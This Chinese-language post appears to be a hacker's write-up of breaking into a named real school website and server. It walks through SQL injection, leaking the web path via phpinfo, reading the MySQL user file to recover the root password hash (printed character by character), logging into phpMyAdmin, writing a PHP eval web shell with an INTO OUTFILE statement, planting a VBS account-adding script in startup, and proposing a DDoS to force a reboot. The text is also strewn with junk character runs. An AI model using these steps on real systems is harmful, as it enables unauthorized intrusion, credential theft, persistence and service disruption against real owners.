第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏5 ~5 f& v( T" r, A$ B& E
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
4 [ J( P2 V$ \6 e/ A' w# z1 c, N% i
6 t1 E$ c' q; n9 n$ T# R# ]* m' m% b" s" |* x3 K" J- b
; K. Z: c1 d+ z% I H
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
) Z( ]1 D# i X9 L9 g0 @; W" g, t9 L) |6 ]
那么想可以直接写入shell ,getshell有几个条件:# Y% Y# c- J6 U4 r2 m
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF : D3 L4 q5 w! L, b. B9 e/ b
! I" i5 H/ P% v! w试着爆绝对路径:
+ B% t. v* Z( w* K1./phpMyAdmin/index.php?lang[]=1
# ?. t3 |: f& x% E7 f0 \1 h2./phpMyAdmin/phpinfo.php
/ f- m$ |% r7 A3./load_file()
& A9 V3 y7 m7 G4./phpmyadmin/themes/darkblue_orange/layout.inc.php 7 l7 E% o# g. V+ G3 W* ?
5./phpmyadmin/libraries/select_lang.lib.php
! Z" R1 M: S9 F& s8 @6./phpmyadmin/libraries/lect_lang.lib.php
# `& B. h: h2 g0 s7./phpmyadmin/libraries/mcrypt.lib.php
# t& I2 @4 D/ f9 b/ ^8./phpmyadmin/libraries/export/xls.php 0 Z# K E/ N/ \& h0 [8 S
- {1 S3 R" [& F8 P! O( }
均不行...........................
+ o3 z1 ^) F4 k
" S0 \$ ]. O+ G( ?( R% L御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
: Q( n) W3 n/ a$ k0 [5 _8 f. c) k
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin % I( P# y* h9 I& T3 g
q `& A# m# D7 @) M; m
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
) x m. W6 E4 z$ O3 E/ g. ^/ c& |' D8 }5 y
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 4 \" V' X1 n u
( n1 B* o" V: {4 n5 U想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
7 N: O8 H- h2 } v3 D& @' d3 a& l4 U+ c6 ^8 t$ i$ q
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 3 ~7 P4 j: p& }; U
& `4 E6 m5 K$ U- J
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
; V. q; P* M! v& H/ `7 g; G2 G- F. T
成功读到root密码: # I8 F+ C9 P8 A3 |4 J
1 q: e, v+ c& U* n6 C17---- r(0072) : M/ b w, L& s! }* G6 j, p
18---- o(006f)
* V4 O$ i2 |$ }4 P- R Q; b19---- o(006f)
k3 b$ T8 \; g. V+ H: B0 X v20---- t(0074)
% p2 u0 x P" e21---- *(002a)
* l7 o* [) V7 v6 B; j) j22---- 8(0038)
4 I/ S; H; C+ R23---- 2(0032)
1 k! s- J7 J6 }* L7 u# J24---- E(0045) 5 G1 g6 E4 e# L2 @
25---- 1(0031) * }/ H T4 B* X# G
26---- C(0043)
& [, D$ i7 B! A h. R# _8 V6 _) h" H27---- 5(0035) - e0 `. D7 s4 e$ h- U. `
28---- 8(0038)
% p" X1 \- Q! S+ _0 e3 g" i& g4 ~29---- 2(0032)
, ~; [6 n- {9 R1 N4 N, U) f30---- 8(0038)
$ v' a5 n3 d& |31---- A(0041) & l5 o" i4 l9 j0 c$ s! @& B) A
32---- 9(0039)
7 u- v, G7 u2 ^! o33---- B(0042)
0 [% S+ \9 |* e3 U$ ]34---- 5(0035)
) w' B" b& c1 z' q& c35---- 4(0034) 8 t2 `2 \6 E) u
36---- 8(0038) 0 \6 j' W4 `6 A# T
37---- 6(0036) ' O- Y& [" }* j) m% Z" t& D
38---- 4(0034)
% k: a0 n2 k- q+ b! z( ^39---- 9(0039)
2 `) K2 \8 h8 Z40---- 1(0031)
' X; {/ Z2 V$ J' M9 T! Y+ n41---- 1(0031) ( t# V* ^' S9 n' V+ e& `+ U( N
42---- 5(0035) ( z$ Y) k% ]: G) k5 m
43---- 3(0033) 8 g! ]" X+ f5 [" b. z, E( _4 A ]. k
44---- 5(0035) % @2 d0 s6 h/ |5 E9 e5 }( @1 A. Z
45---- 9(0039)
( w5 M2 F7 p* o" ]4 ~46---- 8(0038) . d6 ]8 g1 Z/ w5 q$ D
47---- F(0046) 0 v9 k) d% z# C
48---- F(0046) 5 b- }/ |1 Q& a& }
49---- 4(0034) * |! K$ x2 b, U, T/ E! A! T
50---- F(0046) . Y) _, T8 U# c
51---- 0(0030)
' k+ I" u6 l9 ^3 i52---- 3(0033)
8 a: O; [* g+ W4 g4 j$ [8 \53---- 2(0032) 6 d m3 q% w- h1 D
54---- A(0041) : J! j% S' L9 `; c
55---- 4(0034) % f: Q5 K0 n4 E8 w0 g# b3 H1 T2 i
56---- A(0041)
: `* b! q1 I q3 f$ D5 e57---- B(0042) % l# O3 R' ~6 @! v
58---- *(0044)
% [; J7 k \/ T9 P59---- *(0035)
8 V* o8 a; N+ T60---- *(0041) ! q* _; c5 }# o' c% X
61---- *0032)
- R0 Z" L4 _4 a2 z) F5 N1 k/ \$ | Z. h2 l- Y9 i
解密后成功登陆phpmyamin
/ E0 q2 b9 M. l% A 1 y1 G! O) b) J5 ?7 {$ `( l* C
. T- W& f, v3 n- m N/ q8 [5 G, v
- h+ J0 u. e% v* A1 O/ A- d( d8 t
- }+ F! U2 W4 X找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 6 n' x+ B6 q/ G' ~! \/ R! o( J$ ?8 D
4 k0 s0 `( a, c. m! Z/ M4 A
成功执行,拿下shell,菜刀连接: 3 L7 x6 ?9 O& `' J
* z N/ h1 ~8 X% E7 Y% B0 ~
服务器不支持asp,aspx,php提权无果...................
1 k; R. z. Y0 i, J: Q6 K' `3 @- U6 w$ F
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
6 q/ t2 T1 u) c' G$ r9 Y- x& s服务器上已经有个隐藏帐号了
7 M8 G# T( m# _) B别名 administrators
3 T' A* \* P& v: v注释 管理员对计算机/域有不受限制的完全访问权
- ~) n$ Y0 ^0 q! ?. ?0 T1 @6 I成员 6 Z& x( ?. Q7 y8 {- T3 X% m
-------------------------------------------------------------------------------" \% @8 j e+ B6 @4 `
admin+ i% C. ?. f" }* p) |
Administrator7 C& S' t/ n* r; Z5 `: `7 f
slipper$
K5 i( V u+ ]5 t8 M& Ysqluser" Z+ e) G3 j1 D/ U
命令成功完成。 ( c- r( J; ?: m3 @9 S" E
' j) }$ D: \5 M, [
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
) c3 ~) `; L D% ~: m5 w* }* x# p9 q5 z& H- J9 K$ F* d
ddos服务器重启,不然就只能坐等服务器重启了...............................
9 T9 p% K, q9 b- A: j: d( V w& @& ]
: ]6 I$ @0 S( G. o |